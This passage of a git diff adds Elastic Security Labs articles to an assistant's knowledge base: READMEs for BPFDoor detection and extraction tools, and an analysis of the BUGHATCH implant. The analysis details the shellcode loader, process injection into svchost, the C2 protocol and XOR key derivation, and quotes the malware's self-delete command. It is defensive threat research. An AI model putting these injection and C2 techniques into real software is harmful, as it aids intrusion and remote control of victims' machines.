+  - bpfdoor
+---
+
+Configuration extractor to dump out hardcoded passwords with BPFDoor.
+
+[Download bpfdoor-config-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f57100ade3473c5/62882ccdb4fa6b61ed70ba87/bpfdoor-config-extractor.tar.gz)
+
+## Overview
+
+This tool provides a Python module and command line tool that will extract passwords from BPFDoor samples.
+
+> The Elastic Security Team has released an indepth analysis of the BPFDoor malware and created an additional tool that will scan for BPFDoor infected hosts.
+>
+> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/)
+> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner)
+
+## Getting Started
+
+### Docker
+
+We can easily run the extractor with Docker, first we need to build the image.
+
+```
+Building the BPFDoor Docker image
+
+docker build . -t bpfdoor-extractor
+```
+
+Then we run the container with the **-v** flag to map a host directory to the Docker container directory that contains the BPFDoor samples.
+
+```
+Running the BPFDoor Docker container
+
+docker run -ti --rm -v $(pwd)/binaries:/binaries \
+  bpfdoor-extractor:latest -d /binaries/
+```
+
+We can either specify a single sample with **-f** option or a directory of samples with **-d**
+
+```
+BPFDoor Configuration Extractor help output
+
+docker run -ti --rm bpfdoor-extractor:latest -h
+
+Author: Elastic Security (MARE)
+
+______ ______ ______ ______
+| ___ \| ___ \|  ___||  _  \
+| |_/ /| |_/ /| |_   | | | | ___    ___   _ __
+| ___ \|  __/ |  _|  | | | |/ _ \  / _ \ | '__|
+| |_/ /| |    | |    | |/ /| (_) || (_) || |
+\____/ \_|    \_|    |___/  \___/  \___/ |_|
+ _____                 __  _          _____       _                      _
+/  __ \               / _|(_)        |  ___|     | |                    | |
+| /  \/  ___   _ __  | |_  _   __ _  | |__ __  __| |_  _ __  __ _   ___ | |_  ___   _ __
+| |     / _ \ | '_ \ |  _|| | / _` | |  __|\ \/ /| __|| '__|/ _` | / __|| __|/ _ \ | '__|
+| \__/\| (_) || | | || |  | || (_| | | |___ >  < | |_ | |  | (_| || (__ | |_| (_) || |
+ \____/ \___/ |_| |_||_|  |_| \__, | \____//_/\_\ \__||_|   \__,_| \___| \__|\___/ |_|
+                               __/ |
+                              |___/
+
+
+usage: bpfdoor-extractor [-h] (-f FILENAME | -d DIRNAME)
+
+options:
+  -h, --help            show this help message and exit
+  -f FILENAME, --file FILENAME
+                        File
+  -d DIRNAME, --dir DIRNAME
+                        Directory
+
+```
+
+### Running it Locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+bpfdoor-extractor --help
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_scanner.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_scanner.md
new file mode 100644
index 0000000000000..529435d350f82
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bpfdoor_scanner.md
@@ -0,0 +1,105 @@
+---
+title: "BPFDoor Scanner"
+slug: "bpfdoor-scanner"
+date: "2022-12-06"
+description: "Python script to identify hosts infected with the BPFDoor malware."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - bpfdoor
+---
+
+Python script to identify hosts infected with the BPFDoor malware.
+
+[Download bpfdoor-scanner.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltae9bafece9048014/62882b50dcc93261eccb04e2/bpfdoor-scanner.tar.gz)
+
+## Getting Started
+
+This tool provides a Python script to identify hosts that are infected with the BPFDoor malware.
+
+> The Elastic Security Team has released an indepth analysis of the BPFDoor malware and created an additional tool that will extract configurations from BPFDoor malware samples.
+>
+> - [BPFDoor analysis](https://bookish-bassoon-c37be003.pages.github.io/intelligence/2022/05/04.bpfdoor/article/)
+> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor)
+
+### Permissions
+
+On Linux (and thus in a container), the tool requires the following permissions:
+
+- CAP_NET_BIND_SERVICE
+- CAP_NET_RAW
+
+On any \*NIX host, running the script with sudo will get you what you need. As long as you don’t strip the privileges listed for your container and you publish the UDP port you intend to receive on, you should be set.
+
+### Docker
+
+We can easily run the scanner with Docker, first we need to build the image:
+
+```
+Building the BPFDoor scanner Docker image
+
+docker build . -t bpfdoor-scanner
+```
+
+## Usage
+
+Once you’be built the Docker iamge, we can run the container to get a list of the options.
+
+```
+Runing the BPFDoor container
+
+docker run -ti --rm bpfdoor-scanner:latest --help
+
+Usage: bpfdoor-scanner [OPTIONS]
+
+  Sends a discovery packet to suspected BPFDoor endpoints.
+
+  Example usage:
+
+      sudo ./bpfdoor-scanner --target-ip 1.2.3.4
+
+  Sends a packet to IP 1.2.3.4 using the default target port 68/UDP (tool
+  listens on all ports) using the default interface on this host and listens
+  on port 53/UDP to masquerade as traffic.
+
+  NOTE: Elevated privileges are required for source ports < 1024.
+
+Options:
+  --target-ip TEXT       [required]
+  --target-port INTEGER  [default: 68]
+  --source-ip TEXT       IP for target to respond to and attempt to bind
+                         locally  [default: 172.17.0.3]
+  --source-port INTEGER  Local port to listen on for response  [default: 53]
+  --timeout INTEGER      Number of seconds to wait for response  [default: 5]
+  -v, --verbose          Show verbose output
+  -d, --debug            Show debug output
+  --version
+  --help                 Show this message and exit.
+```
+
+The minimum required option is just --target-ip. The rest have defaults. For running in a container, you’ll want to publish the return port (defaults to 53) and specify --source-ip of the host interface you wish to use. In the following example, the IP 192.168.100.10 is the interface on my host that will receive the packet.
+
+```
+Example running the BPFDoor scanner
+
+docker run -ti --publish 53:53/udp --rm bpfdoor-scanner:latest \
+  --target-ip 192.168.32.18 --source-ip 192.168.100.10
+```
+
+## Running Locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+Running BPFDoor scanner locally
+
+poetry lock
+poetry install
+poetry shell
+sudo bpfdoor-scanner --help
+```
+
+Once that works, you can do the same sort of things as mentioned in the Docker instructions above.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bughatch_malware_analysis.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bughatch_malware_analysis.md
new file mode 100644
index 0000000000000..94ccb7e375c5b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bughatch_malware_analysis.md
@@ -0,0 +1,528 @@
+---
+title: "BUGHATCH Malware Analysis"
+slug: "bughatch-malware-analysis"
+date: "2022-09-09"
+subtitle: "Malware analysis of the BUGHATCH downloader."
+description: "Elastic Security has performed a deep technical analysis of the BUGHATCH malware. This includes capabilities as well as defensive countermeasures."
+author:
+  - slug: salim-bitam
+image: "libraries-edev-ops-1680x980.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - bughatch
+  - cuba
+  - ref9019
+---
+
+## Key takeaways
+
+- Elastic Security Labs is releasing a BUGHATCH malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)
+- This report covers detailed code analysis, network communication protocols, command handling, and observed TTPs
+- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to detect the BUGHATCH downloader
+
+## Preamble
+
+BUGHATCH is an implant of a custom C2 deployed during the CUBA ransomware campaigns we observed in February of 2022, this tool was most likely built by the threat actor themselves as it was not used previously.
+
+BUGHATCH is capable of downloading and executing commands and arbitrary code, it gives the operator the freedom to execute payloads with different techniques like reflection, shellcode execution, system command execution, and so on. The samples we have seen were not obfuscated and were deployed using a custom obfuscated in-memory dropper written in PowerShell and referred to as [TERMITE by Mandiant](https://www.mandiant.com/resources/unc2596-cuba-ransomware).
+
+In this document, we will go through the execution flow of BUGHATCH highlighting its functionalities and code execution techniques, a YARA rule and the MITRE ATT&CK mapping can be found in the appendix.
+
+In this analysis we will describe the following:
+
+- Token adjustment
+- Information collection
+- Threading and thread synchronization
+- Network communication protocol
+- Command handling
+
+> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:
+>
+> - [CUBA Ransomware Campaign](https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis)
+> - [CUBA Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)
+
+## Static analysis
+
+|              |                                                                  |
+| ------------ | ---------------------------------------------------------------- | --- |
+| SHA256       | F1325F8A55164E904A4B183186F44F815693A008A9445D2606215A232658C3CF |
+| File Size    | 35840 bytes                                                      |
+| File Type:   | Win32 executable                                                 |
+| Signed?      | No                                                               |
+| Packer?      | No                                                               |
+| Compiler     | Visual Studio 2017 - 15.5.0 preview 2                            |
+| Compile Time | Sun Feb 06 21:05:18 2022                                         | UTC |
+| Entropy      | 6.109                                                            |
+
+### Sections
+
+|        |                |              |          |         |                                  |
+| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |
+| Name   | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5                              |
+| .text  | 0x1000         | 0x6000       | 0x5400   | 5.933   | A6E30CCF838569781703C943F18DC3F5 |
+| .rdata | 0x7000         | 0x3000       | 0x2A00   | 6.217   | 9D9AD1251943ECACE81644A7AC320B3C |
+| .data  | 0xA000         | 0x1000       | 0x400    | 1.163   | B983B8EB258220628BE2A88CA44286B4 |
+| .reloc | 0xB000         | 0x424        | 0x600    | 5.235   | 39324A58D79FC5B8910CBD9AFBF1A6CB |
+
+## Code analysis
+
+BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs ( **VirtualAlloc** , **CreateThread, WaitForSingleObject** ).
+
+The PowerShell loader uses inline C# to load APIs needed for shellcode injection as seen in the following pseudocode.
+
+![Pseudocode PowerShell inline C#](/assets/images/bughatch-malware-analysis/image12.jpg)
+
+The PowerShell script is obfuscated with random functions and variable names and contains the shellcode in a reverse-Base64 format.
+
+![Pseudocode embedded shellcode in Base64 format](/assets/images/bughatch-malware-analysis/image10.png)
+
+The script first decodes the reverse-Base64 encoded data, then allocates a memory region with **VirtualAlloc** before copying the shellcode into it. Finally, the script executes the shellcode by creating a new thread with the **CreateThread** API.
+
+![Pseudocode PowerShell creates a new thread to execute the shellcode](/assets/images/bughatch-malware-analysis/image38.jpg)
+
+The shellcode downloads another shellcode blob and the encrypted PE implant from the C2 server, this second shellcode decrypts and reflectively loads the PE malware.
+
+This section dives deeper into the BUGHATCH execution flow, threading and encryption implementation, communication protocol with C2, and finally supported commands and payload execution techniques implemented.
+
+The following is a diagram summarizing the execution flow of the implant:
+
+![Execution flow diagram of BUGHATCH](/assets/images/bughatch-malware-analysis/image16.png)
+
+![Pseudocode of the main function](/assets/images/bughatch-malware-analysis/image15.jpg)
+
+### Token adjustment
+
+The implant starts by elevating permissions using the **SeDebugPrivilege** method, enabling the malware to access and read the memory of other processes. It leverages common Windows APIs to achieve this as shown in the pseudocode below:
+
+![](/assets/images/bughatch-malware-analysis/image20.jpg)
+
+### Information collection
+
+The malware collects host-based information used to fingerprint the infected system, this information will be stored in a custom structure that will be 2-byte XOR encrypted and sent to the C2 server in an HTTP POST request.
+
+The following lists the collected information:
+
+- Current value of the performance counter
+- Network information
+- System information
+- Token information
+- Domain and Username of the current process
+- Current process path
+
+#### Current value of the performance counter
+
+Using the **QueryPerformanceCounter** API, it collects the amount of time since the system was last booted. This value will be used to compute the 2-byte XOR encryption key to encrypt communications between the implant and the C2 server, a detailed analysis of the encryption implementation will follow.
+
+![Pseudocode QueryPerformanceCounter function](/assets/images/bughatch-malware-analysis/image42.jpg)
+
+#### Network information
+
+It collects the addresses of network interfaces connected to the infected machine by using the **GetIpAddrTable** Windows API.
+
+![Pseudocode collecting interface addresses](/assets/images/bughatch-malware-analysis/image22.jpg)
+
+#### System information
+
+BUGHATCH collects key system information which includes:
+
+- Windows major release, minor release, and build number
+- Processor architecture (either 32-bit or 64-bit)
+- Computer name
+
+![Pseudocode collecting system information](/assets/images/bughatch-malware-analysis/image18.jpg)
+
+#### Token information
+
+The agent proceeds to collect the current process token group membership, it invokes the **AllocateAndInitializeSid** API followed by the **CheckTokenMembership** API, concatenating the [SDDL SID strings](https://docs.microsoft.com/en-us/windows/win32/secauthz/sid-strings) for every group the process token is part of. While not unique to BUGHATCH, this is detected by Elastic's [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html) detection rule.
+
+![Pseudocode collecting token group membership information](/assets/images/bughatch-malware-analysis/image29.jpg)
+
+#### Domain and username of the current process
+
+The malware opens a handle to the current process with **OpenProcessToken** and gets the structure that contains the user account of the token with **GetTokenInformation**. It then retrieves the username and domain of the user account with the **LookupAccountSidW** API and concatenates the 2 strings in the following format: **DOMAIN\USERNAME**.
+
+![](/assets/images/bughatch-malware-analysis/image14.jpg)
+
+#### Current process path
+
+Finally, it collects the current process path with **GetModuleFileNameW**. The malware then encrypts the entire populated structure with a simple 2-byte XOR algorithm, this encryption implementation is detailed later in the report.
+
+## Threading and thread synchronization
+
+The implant is multithreaded; it uses two different linked lists, one is filled with the commands received from the C2 server and the other is filled with the output of the commands executed.
+
+It spawns 5 worker threads, each handling a command received from the C2 server by accessing the appropriate linked list using the **CriticalSection** object. The main process’ thread also retrieves the command's output from the second linked list using the **CriticalSection** object for synchronization purposes, to avoid any race conditions.
+
+![Pseudocode of the thread creation function](/assets/images/bughatch-malware-analysis/image45.jpg)
+
+## Network communication protocol
+
+In this section we will detail:
+
+- Base communication protocol
+- Encryption implementation
+
+The implant we analyzed uses HTTP(S) for communications. On top of the SSL encryption of the protocol, the malware and C2 encrypt the data with a 2-byte XOR key computed by the malware for each new session. The values to compute the 2-byte XOR key are prepended at the beginning of the base protocol packet which the server extracts to decrypt/encrypt commands.
+
+When launched, the malware will first send an HTTP POST request to the C2 server containing all the collected information extracted from the victim’s machine, the C2 then responds with the operator’s command if available, or else the agent sleeps for 60 seconds. After executing the command and only if the output of the executed command is available, the malware will send a POST request containing both the collected information and the command’s output, otherwise, it sends the collected information and waits for new commands.
+
+![Example of an implant HTTP POST request to an emulated C2 server](/assets/images/bughatch-malware-analysis/image32.png)
+
+### Base communication protocol
+
+The author(s) of BUGHATCH implemented a custom network protocol, the following is the syntax that the agent and server use for their communication:
+
+![BUGHATCH agent and server communications](/assets/images/bughatch-malware-analysis/BugHatchanalysisreport_html.jpg)
+
+- **XOR key values:** The values to compute the 2-byte XOR encryption key used to encrypt the rest of the data
+- **Separator:** A static value ( **0x389D3AB7** ) that separates **Msg** chunks, example: the server can send different instructions in the same HTTP request separated by the **Separator**
+- **Chunk length:** Is the length of the **Msg** , **Separator** and **Chunk length**
+- **Msg:** Is the message to be sent, the message differs from the agent to the server.
+
+We will dive deeper into the encapsulation of the **Msg** for both the agent and the server.
+
+![Pseudocode extracting commands according to the separator value](/assets/images/bughatch-malware-analysis/image40.jpg)
+
+### Encryption implementation
+
+The malware uses 2-byte XOR encryption when communicating with the C&C server; a 2-byte XOR key is generated and computed by the implant for every session with the C2 server.
+
+The agent uses two DWORD values returned by **QueryPerformanceCounter** API as stated earlier, it then computes a 2-byte XOR key by XOR-encoding the DWORD values and then multiplying and adding hardcoded values. The following is a Python pseudocode of how the KEY is computed:
+
+```
+tmp = (PerformanceCount[0] ^ PerformanceCount[1]) & 0xFFFFFFFF
+XorKey = (0x343FD * tmp + 0x269EC3)& 0xFFFFFFFF
+XorKey = p16(XorKey >> 16).ljust(2, b'\x00')
+```
+
+![Pseudocode of the encryption implementation](/assets/images/bughatch-malware-analysis/image9.jpg)
+
+## Command handling
+
+In this section, we will dive deeper into the functionalities implemented in the agent and their respective **Msg** structure that will be encapsulated in the base communication protocol structure as mentioned previously.
+
+Once the working threads are started, the main thread will continue beaconing to the C2 server to retrieve commands. The main loop is made up of the following:
+
+- Send POST request
+- Decrypt the received command and add it to the linked list
+- Sleep for 60 seconds
+
+A working thread will first execute the **RemoveEntryRecvLinkedList** function that accesses and retrieves the data sent by the C2 server from the linked list.
+
+![Pseudocode retrieves data sent by the C2](/assets/images/bughatch-malware-analysis/image43.jpg)
+
+The thread will then de-encapsulate the data received from the C2 and extract the **Msg(Command)**. The malware implements different functionalities according to a command flag, the table below illustrates the functionalities of each command:
+
+|              |                                                                       |
+| ------------ | --------------------------------------------------------------------- |
+| Command FLAG | Description                                                           |
+| 1            | Group functions related to code and command execution                 |
+| 2            | Group functions related to utilities like impersonation and migration |
+| 3            | Process injection of a PE file in a suspended child process           |
+
+### Command 1
+
+This command gives access to functionalities related to payload execution, from DLL to PE executable to PowerShell and cmd scripts.
+
+Some of the sub-commands use pipes to redirect the standard input/output of the child process, which enables the attacker to execute payloads and retrieve its output, for example, PowerShell or Mimikatz, etc…
+
+The following is the list of sub commands:
+
+|                  |                             |                                                                                                                                           |
+| ---------------- | --------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
+| Sub Command Flag | Function Name               | Functionality description                                                                                                                 |
+| 2                | ReflectivelyExecutePERemote | Reflectively loads PE files in a child process and redirects its standard input output, the output will be sent to the operator C2 server |
+| 3                | DropPEDiskExecute           | Drops a PE file to disk and executes it, the execution output is then sent to the operator’s C2 server                                    |
+| 4                | SelfShellcodeExecute        | Executes a shellcode in the same process                                                                                                  |
+| 5                | RemoteShellcodeExecute      | Executes a shellcode in a suspended spawned child process                                                                                 |
+| 6                | ExecuteCmd                  | Executes a CMD script/command                                                                                                             |
+| 7                | ExecutePowershell           | Executes a Powershell script/command                                                                                                      |
+| 9                | ReflectivelyLoadDllRemote   | Executes a DLL reflectively in a remote process using CreateRemoteThread API                                                              |
+
+The following is the structure that is used by the above commands:
+
+```
+struct ExecutePayloadCommandStruct
+{
+  DWORD commandFlag;
+  DWORD field_0;
+  DWORD subCommandFlag_1;
+  DWORD readPipeTimeOut_2;
+  DWORD payloadSize_3;
+  DWORD commandLineArgumentSize_4;
+  DWORD STDINDataSize_5;
+  CHAR payload_cmdline_stdin[n];
+};
+```
+
+- **commandFlag:** Indicates the command
+- **subCommandFlag:** Indicates the subcommand
+- **readPipeTimeOut:** Indicates the timeout for reading the output of child processes from a pipe
+- **payloadSize:** Indicates the payload size
+- **commandLineArgumentSize:** Indicates length of the command line arguments when executing the payload, example a PE binary
+- **STDINDataSize:** Indicates the length of the standard input data that will be sent to the child process
+- **Payload_cmdline_stdin:** Can contain the payload PE file for example, its command line arguments and the standard input data that will be forwarded to the child process, the malware knows the beginning and end of each of these using their respective length.
+
+#### ReflectivelyExecutePERemote
+
+The agent reflectively loads PE binaries in the memory space of a created process in a suspended state (either **cmd.exe** or **svchost.exe** ). The agent leverages [anonymous (unnamed) pipes](https://docs.microsoft.com/en-us/windows/win32/ipc/anonymous-pipes) within Windows to redirect the created child process's standard input and output handles. It first creates an anonymous pipe that will be used to retrieve the output of the created process, then the pipe handles are specified in the **STARTUPINFO** structure of the child process.
+
+![Pseudocode for anonymous pipe creation](/assets/images/bughatch-malware-analysis/image41.jpg)
+
+After creating the suspended process, the malware allocates a large memory block to write shellcode and a XOR encrypted PE file.
+
+The shellcode will 2-byte XOR decrypt and load the embedded PE similar to ( **Command 3** ). This command can load 64bit and 32bit binaries, each architecture has its own shellcode PE loader, after injecting the shellcode it will point the instruction pointer of the child process’s thread to the shellcode and resume the thread.
+
+![Pseudocode of Reflective Loading PE into child processes](/assets/images/bughatch-malware-analysis/image2.jpg)
+
+The following is an example of a packet captured from our custom emulated C2 server, we can see the structure discussed earlier on the left side and the packet bytes on the right side, for each command implemented in the malware, a packet example will be given.
+
+![Example of a ReflectivelyExecutePERemote command received from an emulated C2](/assets/images/bughatch-malware-analysis/image7.png)
+
+#### DropPEDiskExecute
+
+With this subcommand, the operator can drop a PE file on disk and execute it. The agent has 3 different implementations depending on the PE file type, GUI Application, CUI (Console Application), or a DLL.
+
+For CUI binaries, the malware first generates a random path in the temporary folder and writes the PE file to it using **CreateFileA** and **WriteFile** API.
+
+![Pseudocode writing payload to disk](/assets/images/bughatch-malware-analysis/image39.jpg)
+
+It then creates a process of the dropped binary file as a child process by redirecting its standard input and output handles; after execution of the payload the output is sent to the operator’s C2 server.
+
+For GUI PE binaries, the agent simply writes it to disk and executes it directly with **CreateProcessA** API.
+
+And lastly, for DLL PE files, the malware first writes the DLL to a randomly generated path in the temporary folder, then uses **c:\windows\system32\rundll32.exe** or **c:\windows\syswow64\rundll32.exe** (depending on the architecture of the DLL) to run either an exported function specified by the operator or the function **start** if no export functions were specified.
+
+![Pseudocode running the payload dropped by DropPEDiskExecute function](/assets/images/bughatch-malware-analysis/image1.jpg)
+
+![Example of a SelfShellcodeExecute command received from an emulated C2](/assets/images/bughatch-malware-analysis/image34.png)
+
+#### SelfShellcodeExecute
+
+This subcommand tasks the agent to execute shellcode in its own memory space by allocating a memory region using **VirtualAlloc** API and then copying the shellcode to it, the shellcode is executed by creating a thread using **CreateThread** API.
+
+![Pseudocode of SelfShellcodeExecute command](/assets/images/bughatch-malware-analysis/image37.jpg)
+
+![Example of a SelfShellcodeExecute command received from an emulated C2](/assets/images/bughatch-malware-analysis/image35.jpg)
+
+#### RemoteShellcodeExecute
+
+This sub-command can be used to execute a 32-bit or a 64-bit position independent shellcode in another process memory space.
+
+Similarly to the **SpawnAgent** subcommand, the malware creates a suspended **svchost.exe** process with **CreateProcessA** API, allocates a memory region for the shellcode sent by the C2 server with **VirtualAllocEx** , and writes to it with **WriteProcessMemory** , it then sets the suspended thread instruction pointer to point to the injected shellcode with **SetThreadContext** and finally it will resume the thread with **ResumeThread** to execute the payload.
+
+![Pseudocode writes shellcode to remote process](/assets/images/bughatch-malware-analysis/image26.jpg)
+
+![Pseudocode set EIP of child process using SetThreadContext](/assets/images/bughatch-malware-analysis/image13.jpg)
+
+![Example of a RemoteShellcodeExecute command received from an emulated C2](/assets/images/bughatch-malware-analysis/image23.jpg)
+
+#### ExecuteCmd and ExecutePowershell
+
+An operator can execute PowerShell scripts or CMD scripts in the infected machine, the malware can either write the script to a file in the temporary folder with a randomly generated name as follow: **`TEMP<digits>.PS1`** for PowerShell or **`TEMP<digits>.CMD`** for a Command shell. The malware then passes parameters to it if specified by the malicious actor and executes it, the malware uses named pipes to retrieve the output of the PowerShell process.
+
+![Pseudocode of ExecuteCmd command](/assets/images/bughatch-malware-analysis/image30.jpg)
+
+![Example of an ExecutePowershell command received from an emulated C2](/assets/images/bughatch-malware-analysis/image8.jpg)
+
+#### ReflectivelyLoadDllRemote
+
+Execute reflectively a 32-bit or 64-bit DLL in a process created in a suspended state, the following summarizes the execution flow:
+
+- Check if the PE file is a 32 or 64-bit DLL
+- Create a suspended **svchost.exe** process
+- Allocate memory for the DLL and the parameter for the DLL if specified by the C2 command with the **VirtualAllocEx** API
+- Write to the remotely allocated memory withthe **WriteProcessMemory** API the DLL and the parameter if specified
+- Create a remote thread to execute the injected DLL with the **CreateRemoteThread** API
+
+![Pseudocode of a ReflectivelyLoadDllRemote command](/assets/images/bughatch-malware-analysis/image19.jpg)
+
+![Example of a ReflectivelyLoadDllRemote command received from an emulated C2](/assets/images/bughatch-malware-analysis/image34.png)
+
+### Command 2
+
+The command 2 has multiple sub functionalities as shown in the command table above, according to a subCommandFlag the malware can do 6 different operations as follows:
+
+|                  |                       |                              |
+| ---------------- | --------------------- | ---------------------------- |
+| Sub Command Flag | Function Name         | Functionality description    |
+| 1                | ExitProcess           | Exit process                 |
+| 2                | SelfDeleteExitProcess | Self delete and exit process |
+| 3                | SpawnAgent64          | Spawn 64-bit agent           |
+| 4                | SpawnAgent32          | Spawn 32-bit agent           |
+| 0x1001           | ImpersonateToken      | Impersonate explorer         |
+| 0x1002           | MigrateC2             | Change C2 config             |
+
+The following is the structure that is used by the above commands:
+
+```
+struct ImpersonateReplicateStruct
+{
+  int subCommandFlag;
+  int impersonateExplorerToken;
+  char padding[16];
+  __int16 isParameterSet;
+  WCHAR w_parameters[n];
+};
+```
+
+#### ExitProcess
+
+Calls the **ExitProcess(0)** API to terminate.
+
+![Example of an ExitProcess command received from an emulated C2](/assets/images/bughatch-malware-analysis/image25.png)
+
+#### SelfDeleteExitProcess
+
+The agent gets the PATH of the current process with **GetModuleFileNameA** and then executes the following command to self-delete: **cmd.exe /c del FILEPATH \\>\\> NUL** using **CreateProcessA** then simply exit the process with **ExitProcess(0)**.
+
+![Example of a SelfDeleteExitProcess command received from an emulated C2](/assets/images/bughatch-malware-analysis/image17.png)
+
+#### SpawnAgent64 and SpawnAgent32
+
+When subcommands 3 or 4 are specified, the malware will spawn another agent on the same machine depending on the subcommand sent by the C2, as shown in the table above.
+
+The malware first retrieves the C2 IP address embedded in it, it will then do an HTTP GET request to download a packed agent in shellcode format, in the sample we analyzed **/Agent32.bin** URI is for the 32-bit agent, and **/Agent64.bin** is for 64-bit the agent.
+
+![Pseudocode spawning another agent](/assets/images/bughatch-malware-analysis/image33.jpg)
+
+The malware then creates a suspended **svchost.exe** process with **CreateProcessA** API, writes the agent shellcode to the process, sets its instruction pointer to point to the injected shellcode with **SetThreadContext** , and finally it will resume the thread with **ResumeThread** to execute the injected payload.
+
+![Example of a SpawnAgent32 command received from an emulated C2](/assets/images/bughatch-malware-analysis/image5.png)
+
+#### ImpersonateToken
+
+This subcommand is specific to process tokens; an attacker can either impersonate the **explorer.exe** token or create a token from credentials (Domain\Username, Password) sent by the C2 to spawn another instance of the current process.
+
+![Pseudocode ImpersonateToken command](/assets/images/bughatch-malware-analysis/image44.jpg)
+
+It will first check if the current process is a local system account or local service account or network service account by testing whether the given process token is a member of the group with the specified RID ( **SECURITY_LOCAL_SYSTEM_RID** , **SECURITY_LOCAL_SERVICE_RID** , **SECURITY_NETWORK_SERVICE_RID** ) respectively.
+
+![Pseudocode check token group membership](/assets/images/bughatch-malware-analysis/image36.jpg)
+
+Then depending if the operator specified credentials or not, the malware will first call **LogonUserW** with the Domain\User and password to create a token then it will spawn another instance of the current process with this token.
+
+![Pseudocode LogonUserW to create a token](/assets/images/bughatch-malware-analysis/image24.jpg)
+
+If not, the implant will impersonate the **explore.exe** process by duplicating its token with **DuplicateTokenEx** and then spawn the current process with the duplicated token if no credentials are specified.
+
+![Example of an ImpersonateToken command received from an emulated C2](/assets/images/bughatch-malware-analysis/image21.png)
+
+#### MigrateC2
+
+The operator can migrate the implant to another C2 server by specifying the subcommand **0x1001** with the IP address of the new C2.
+
+![Pseudocode migrating the implant](/assets/images/bughatch-malware-analysis/image4.jpg)
+
+![Example of a MigrateC2 command received from an emulated C2](/assets/images/bughatch-malware-analysis/image31.png)
+
+### Command 3
+
+When command 3 is received the malware will reflectively load a PE file embedded as payload in the C&C request in another process's memory space, the following is an overview of the execution:
+
+- Determine the type and architecture of the PE file
+- Create a suspended process
+- Allocate a large memory in the suspended process
+- Write a shellcode in the allocated memory that will locate, decrypt and reflectively load the PE file
+- 2-byte XOR encrypt the PE file and append it after the shellcode
+- Set the EIP context of the suspended process to execute the shellcode
+
+The shellcode will then reflectively load the PE file
+
+![Pseudocode for Command 3's main logic](/assets/images/bughatch-malware-analysis/image6.jpg)
+
+The agent first parses the PE file received from the C2 server to determine the type and architecture of the PE file.
+
+![Pseudocode determines the PE file architecture](/assets/images/bughatch-malware-analysis/image28.jpg)
+
+And according to this information, a Windows signed executable will be chosen to inject into.
+
+If the PE file is CUI (Console User Interface), the malware will choose **cmd.exe** , however, if it is GUI (Graphical User Interface) or a DLL PE file it will choose **svchost.exe**.
+
+![Options for malware to inject into](/assets/images/bughatch-malware-analysis/image11.jpg)
+
+The malware will then create a suspended process with **CreateProcessA** API (either **cmd.exe** or **svchost.exe** ) and allocate a large amount of memory with **VirtualAllocEx** in the created process, it will then copy a position independent shellcode stored in the **.rdata** section to the newly allocated memory that is responsible for locating according to a specific tag the appended PE file, decrypt it and reflectively load it in memory.
+
+Then it appends after the shellcode a 12 bytes structure composed of a tag, the size of the PE file, and a 2-byte XOR key.
+
+It will then 2-byte XOR encrypt the PE file and append it after the structure, the following is an overview of the written data to the allocated memory:
+
+|           |     |         |                |                              |
+| --------- | --- | ------- | -------------- | ---------------------------- |
+| SHELLCODE | TAG | PE SIZE | 2-byte XOR KEY | 2-byte XOR encrypted PE file |
+
+![Pseudocode write shellcode and PE to child process](/assets/images/bughatch-malware-analysis/image27.jpg)
+
+The agent will then set the thread context with **SetThreadContext** and point the instruction pointer of the suspended process to the shellcode then it will simply resume the execution with **ResumeThread**.
+
+The shellcode will first locate the 2-byte XOR encrypted PE file according to the tag value ( **0x80706050** ), it will then 2-byte XOR decrypt it and load it reflectively on the same process memory.
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Collection](https://attack.mitre.org/tactics/TA0009)
+- [Command and Control](https://attack.mitre.org/tactics/TA0011)
+- [Exfiltration](https://attack.mitre.org/tactics/TA0010)
+
+### Techniques / sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
